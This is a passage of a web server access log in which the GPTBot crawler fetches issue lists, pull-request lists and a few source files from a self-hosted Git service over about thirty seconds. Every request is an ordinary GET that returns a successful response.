"https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig?display=source" [Client 74.7.227.38] [Length 11810] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:19:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11019] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:19:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12558] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:19:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11019] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:19:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 38358] [Gzip 9.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:19:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:19:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14504] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:19:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=all&type=all" +[17/Feb/2026:19:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=all&type=all" +[17/Feb/2026:19:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:19:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" +[17/Feb/2026:19:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:28:46 